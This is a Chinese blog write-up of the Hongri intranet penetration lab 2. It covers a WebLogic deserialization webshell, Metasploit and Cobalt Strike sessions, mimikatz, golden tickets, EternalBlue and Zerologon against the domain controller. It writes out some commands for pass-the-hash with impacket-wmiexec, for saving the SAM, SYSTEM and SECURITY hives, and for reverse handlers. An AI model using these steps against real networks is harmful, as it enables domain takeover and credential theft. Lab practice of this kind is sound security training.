红日内网渗透靶场2

这篇具有很好参考价值的文章主要介绍了红日内网渗透靶场2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

 文章来源地址https://www.toymoban.com/news/detail-812660.html

环境搭建:

Web渗透:

weblogic漏洞利用

java反序列化漏洞利用、哥斯拉获取shell

上线msf

msf派生shell到cs

内网信息收集

mimikatz获取用户密码

cs横向移动

PTT攻击(票据传递)

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

cs派生shell给msf

fscan扫描内网

frp搭建socks5隧道代理

永恒之蓝的利用

kiwi获取用户hash

3389远程登录

cve-2020-1472域内提权漏洞的利用

将dc机器账户密码设置为空

wmiexec横向

恢复dc机器账户密码

远程连接域控和pc主机


 

环境搭建:

Web、PC两块网卡,都是nat模式+仅主机模式。DC为仅主机模式。三台主机的默认密码都是1qaz@WSX。

攻击机:kali(nat模式)、win10物理机。

内网网段:10.10.10.1/24

外网网段:192.168.111.1/24

kali:192.168.111.128
web:外:192.168.111.80  内:10.10.10.80
pc:外:192.168.128.201  内:10.10.10.201
dc:10.10.10.10

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

都进行登录,登录pc之后用管理员账号administrator/1qaz@WSX开启360杀软。

登录web服务器时注意:先登录本地用户WEB/de1ay,密码也是默认的那个密码,然后会提示密码过期 要进行修改,修改完成登录之后进行注销再登录到mssql用户(域用户),也是默认的那个密码,然后用本地管理员账号也就是刚刚修改了密码的那个,开启360杀软,然后以管理员身份运行weblogic服务。

红日靶场2,内网渗透,网络,linux,安全

至此,环境就搭建好了。

Web渗透:

Nmap扫描端口开放情况

红日靶场2,内网渗透,网络,linux,安全

开放了多个端口,该靶机的利用点为7001端口

weblogic漏洞利用

看到7001就想到了weblogic,浏览器访问

红日靶场2,内网渗透,网络,linux,安全

访问console目录跳转到weblogic控制台登录页面

红日靶场2,内网渗透,网络,linux,安全

尝试了几个弱口令,没有登录成功,用weblogic专门的扫描工具进行扫描看看存在什么漏洞

红日靶场2,内网渗透,网络,linux,安全

看到存在java反序列化漏洞,用工具进行上传payload,然后用哥斯拉连接。

java反序列化漏洞利用、哥斯拉获取shell

哥斯拉生成payload

红日靶场2,内网渗透,网络,linux,安全

复制生成的payload内容,用java反序列化漏洞利用工具进行上传

红日靶场2,内网渗透,网络,linux,安全

用哥斯拉进行连接

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

上线msf

生成payload反弹shell

红日靶场2,内网渗透,网络,linux,安全

然后通过哥斯拉上传到web服务器(被杀掉的话就考虑生成免杀payload,或者用其他方法攻击),msf开启监听之后再运行

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

成功反弹shell

msf派生shell到cs

Cs开启监听

红日靶场2,内网渗透,网络,linux,安全

Msf

红日靶场2,内网渗透,网络,linux,安全

cs上线成功

内网信息收集

shell ipconfig发现内网网段10.10.10.0/24

红日靶场2,内网渗透,网络,linux,安全

Shell ipconfig /all 发现存在域de1ay.com,根据dns服务器判断域控ip为10.10.10.10

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

Net config workstation

红日靶场2,内网渗透,网络,linux,安全

进行提权做进一步的信息收集

红日靶场2,内网渗透,网络,linux,安全

点击launch之后提权成功

查询域内用户 net user /domain

红日靶场2,内网渗透,网络,linux,安全

查询域控 net group “domain controllers” /domain

红日靶场2,内网渗透,网络,linux,安全

查询域内其他主机名

红日靶场2,内网渗透,网络,linux,安全

分别ping一下dc和pc拿到ip,域控和之前判断的一样

红日靶场2,内网渗透,网络,linux,安全

Ping pc没通  被防火墙拦截了,但也拿到了ip

红日靶场2,内网渗透,网络,linux,安全

portscan 探测存活主机+端口扫描

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

发现域控开了445端口。

mimikatz获取用户密码

执行mimikatz获取用户散列值和明文密码

域管理员

红日靶场2,内网渗透,网络,linux,安全

Web主机本地管理员

红日靶场2,内网渗透,网络,linux,安全

cs横向移动

因为开放了445端口, 创建一个smb监听器,

红日靶场2,内网渗透,网络,linux,安全

然后进行psexec横向

红日靶场2,内网渗透,网络,linux,安全

执行后就看到成功拿下域控

红日靶场2,内网渗透,网络,linux,安全

同理对pc进行横向

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

成功拿下pc

红日靶场2,内网渗透,网络,linux,安全

PTT攻击(票据传递)

根据前面用猕猴桃抓取到的用户NTLM HASH和SID值,对黄金票据进行利用

红日靶场2,内网渗透,网络,linux,安全

选中administrator权限的web主机 右键 access->golden ticket

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

成功之后进行验证

红日靶场2,内网渗透,网络,linux,安全

伪造用户名成功

 

刚刚主要是利用cs进行内网的渗透,接着通过msf进行一个内网的渗透,记录一下。

方法2:通过msf利用永恒之蓝以及3389端口

上线cs

我们可以通过cs来生成一个web delivery,即通过powershell绕过360杀软上线cs

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

然后通过哥斯拉执行powershell上线

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

成功上线cs

cs派生shell给msf

打开msf,启动handler监听

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_http

set lhost xxxxxx  

set lport xxxx

run

 

红日靶场2,内网渗透,网络,linux,安全

cs新建一个外部监听

红日靶场2,内网渗透,网络,linux,安全

然后在cs的控制台输入spawn cs-msf

红日靶场2,内网渗透,网络,linux,安全

msf中成功接收

红日靶场2,内网渗透,网络,linux,安全

尝试getsystem提权,行不通。

fscan扫描内网

上传fscan到web主机上然后进行扫描

红日靶场2,内网渗透,网络,linux,安全

然后利用fscan扫描内网网段

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

发现10和80都存活且都存在永恒之蓝

由于都开了防火墙,所以说远程是打不进去的,尝试用本地流量来打。

frp搭建socks5隧道代理

通过frp建立一个SOCKS隧道

红日靶场2,内网渗透,网络,linux,安全

上传完之后编辑frpc.ini,改为本地的ip

红日靶场2,内网渗透,网络,linux,安全

然后现在kali本地启动服务端

红日靶场2,内网渗透,网络,linux,安全

再运行刚刚上传的客户端

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

永恒之蓝的利用

然后通过执行命令

setg Proxies socks5:127.0.0.1:8989

Setg ReverseAllowProxy true

 

设置一个全局代理

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

攻击成功。

kiwi获取用户hash

接着通过kiwi抓取用户密码

Load kiwi

Creds_all

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

拿到了web主机本地用户的用户名和密码以及域用户的用户名和密码。

3389远程登录

最开始的扫描过程中得知了是开了3389端口的,可以进行远程登录一波

修改proxychains的配置文件vi /etc/proxychains.conf

红日靶场2,内网渗透,网络,linux,安全

然后通过代理进行远程登录

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

由于使用的是本地管理员账户进行登录,所以可以退了杀软,关闭防火墙

红日靶场2,内网渗透,网络,linux,安全

cve-2020-1472域内提权漏洞的利用

接着对cve-2020-1472域内提权漏洞进行利用(下文相关的exp和poc都可以在github上找到)

由于不知道是否存在该域内提取漏洞,所以先使用github上的poc对dc进行检测是否存在该漏洞

开着代理来执行poc

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

说明dc存在该漏洞。

将dc机器账户密码设置为空

然后用该漏洞的exp进行攻击,该攻击使得dc机器账户的密码设置为空

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

重置成功

红日靶场2,内网渗透,网络,linux,安全

接着通过impacket包(先apt install python3-impacket)来dump用户hash,linux下$代表变量 所以要加\进行转义

红日靶场2,内网渗透,网络,linux,安全

拿到域管理员的hash。因为知道了这个的密码强度过高,直接进行解密的话是无法成功的

wmiexec横向

可以通过impacket包的wmiexec进行一个横向

Proxychains impacket-wmiexec -hashes NTLM-HASH ./administrator@10.10.10.10

红日靶场2,内网渗透,网络,linux,安全

成功拿到dc的shell,接下来就是要拷贝dc中SAM数据库到本地,然后提取里面的数据来恢复刚刚我们清空的dc机器账户的密码(这是因为如果机器账户hash长时间为空,可能会导致脱域,对内网的使用产生重大影响,因此拿到权限的第一时间需要把hash重置回去。)

先执行如下三条命令将数据库的三个文件保存到dc本地,然后用get命令进行下载 最后可以在dc中将其删掉

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

reg save HKLM\SECURITY security.save

get system.save

get sam.save

get security.save

del /f system.save

del /f sam.save

del /f security.save

 

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

然后可以在靶机中将其删掉

红日靶场2,内网渗透,网络,linux,安全

恢复密码之前顺便修改一下域管的密码

红日靶场2,内网渗透,网络,linux,安全

恢复dc机器账户密码

利用impacket-secretsdump提取那三个文件里的数据

红日靶场2,内网渗透,网络,linux,安全

然后利用脚本进行恢复

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

这时候再用刚刚的impacket-secretsdump -no-pass来dump 用户hash,

红日靶场2,内网渗透,网络,linux,安全

发现无法获取了,说明恢复成功

远程连接域控和pc主机

接着在刚刚开启的远程桌面进行远程连接域控 administrator/Admin12345

红日靶场2,内网渗透,网络,linux,安全

 红日靶场2,内网渗透,网络,linux,安全

成功连接域控,关闭其防火墙

红日靶场2,内网渗透,网络,linux,安全

然后在服务管理器发现域内另外一台机器pc

红日靶场2,内网渗透,网络,linux,安全

再ping一下它就拿到它的ip,再次进行远程登录,开始登录失败了,要以de1ay域的管理员登录才能成功,如下图

红日靶场2,内网渗透,网络,linux,安全

红日靶场2,内网渗透,网络,linux,安全

同样,把杀软退了和关闭防火墙,防火墙都关了之后就可以正常进行上线了,后续就不展示了(开始用cs上线过)

 

 

最后附一个链接了解cve-2020-1472域内提取漏洞:

https://www.jianshu.com/p/525be0335404

 

 

到了这里,关于红日内网渗透靶场2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 内网渗透靶场02----Weblogic反序列化+域渗透

     网络拓扑:                  利用 kscan工具 ,针对192.168.111.0/24 C段开展端口扫描,发现2台存活主机,具体如下图所示:                 192.168.111.80  开放 80、445、3389、7001 端口。                 192.168.111.201 开放 3389、445 端口 根据上述端口发放情况

    2024年02月19日
    浏览(36)
  • 内网渗透思路学习——靶场实战——暗月项目七

    #免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47 项目七靶场渗透最终目的:获得域控中的flag.txt文件中的内容 项目七靶场环境是用 VMware Workstation 搭建,把环境

    2023年04月10日
    浏览(41)
  • 网络安全内网渗透之信息收集--systeminfo查看电脑有无加域

    systeminfo输出的内容很多,包括主机名、OS名称、OS版本、域信息、打的补丁程序等。 其中,查看电脑有无加域可以快速搜索: 输出结果为WORKGROUP,可见该机器没有加域: systeminfo的所有信息如下: C:UsersAdministratorsysteminfo 主机名:           USER-20210123NC OS 名称:          M

    2024年02月07日
    浏览(60)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(40)
  • 网络安全内网渗透之DNS隧道实验--dnscat2直连模式

    目录 一、DNS隧道攻击原理 二、DNS隧道工具 (一)安装dnscat2服务端 (二)启动服务器端 (三)在目标机器上安装客户端 (四)反弹shell         在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。入股哦在互联网上

    2024年02月06日
    浏览(49)
  • 红日靶场5

    目录 前言 外网渗透 信息收集 1、arp探测 2、nmap 3、nikto 4、whatweb 5、gobuster 6、dirsearch 漏洞探测 ThinKPHP漏洞 漏洞利用 get shell 内网渗透 信息收集 CS 启动! CS连接 CS信息收集 1、hashdump 2、猕猴桃 3、端口扫描 MSF启动! MSF木马生成 MSF监听模块 MSF信息收集 1、添加内网路由 2、引入

    2024年01月16日
    浏览(34)
  • 红日靶场四

    目录 环境搭建 环境说明 官方描述 外网信息收集与利用 struts2漏洞 Tomcat漏洞  docker逃逸 提权  内网渗透 扫描内网主机端口 端口转发 利用永恒之蓝获得win7  mimikatz抓取密码  域横向移动 利用Kerberos 域用户提权漏洞获得域控WIN2008 上传msf马到域控   mimikatz抓取密码 远程登陆域

    2024年02月03日
    浏览(40)
  • 红日靶场2

    1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入 2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.

    2023年04月16日
    浏览(27)
  • 红日靶场1

    靶场环境搭建 机器名称 外网IP(模拟外网) 内网IP(模拟内网) 攻击机器 192.168.142.133 Win7机器 192.168.142.210 192.168.140.210 Win Server 2008机器(DC) 192.168.140.220 Win Server 2003机器 192.168.140.230 坑点 (1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。 1、通过

    2024年02月08日
    浏览(38)
  • 红日靶场(七)vulnstack7

    环境下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 靶场配置 DMZ IP段为192.168.1.0/24 二层网络 IP段为192.168.52.0/24 三层网络 IP段为192.168.93.0/24 VM新增虚拟网卡VMnet8、VMnet14。VMnet8为NAT模式,IP段为192.168.52.0/24;VMnet14为仅主机模式,IP段为192.168.93.0/24 VMnet14设为仅主机模式这样三层网络中

    2024年02月03日
    浏览(38)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包